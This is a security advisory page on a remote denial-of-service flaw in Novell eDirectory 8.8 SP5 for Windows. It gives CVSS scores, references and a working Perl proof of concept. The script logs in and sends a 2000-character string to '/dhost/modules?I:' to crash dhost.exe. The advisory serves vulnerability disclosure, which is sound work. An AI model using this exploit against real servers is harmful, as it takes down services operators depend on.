Novell eDirectory 8.8 SP5 Denial of Service

2010-03-01 / 2010-03-02
Credit: Hackattack
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Product: Novell eDirectory 8.8 sp5 for Windows ******** Vulnerability: Denial of Service ******** Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe) Also in last weeks published another bug in 'modules?L:' It is not patched yet too.. ******** Credits: HACKATTACK IT SECURITY GmbH Penetration Testing in Deutschland - sterreich - Schweiz www.hackattack.com ************************************************************************ ******** Original Advisory www.hackattack.com ******** PoC: #!usr\bin\perl #Vulnerability has found by HACKATTACK use WWW::Mechanize; use LWP::Debug qw(+); use HTTP::Cookies; $address=$ARGV[0]; if(!$ARGV[0]){ print "Usage:perl $0 address\n"; exit(); } $login = "$address/_LOGIN_SERVER_"; $url = "$address/dhost/"; $module = "modules?I:"; $buffer = "A" x 2000; $vuln = $module.$buffer; #Edit the username and password. $user = "username"; $pass = "password"; #Edit the username and password. my $mechanize = WWW::Mechanize->new(); $mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1)); $mechanize->timeout($url_timeout); $res = $mechanize->request(HTTP::Request->new('GET', "$login")); $mechanize->submit_form( form_name => "authenticator", fields => { usr => $user, pwd => $pass}, button => 'Login'); $response2 = $mechanize->get("$url$vuln"); About HACKATTACK ================ HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria More Information about HACKATTACK at http://www.hackattack.com

References:

http://xforce.iss.net/xforce/xfdb/54264
http://www.securityfocus.com/bid/37009
http://www.securityfocus.com/archive/1/archive/1/507812/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2026, cxsecurity.com

 

Back to Top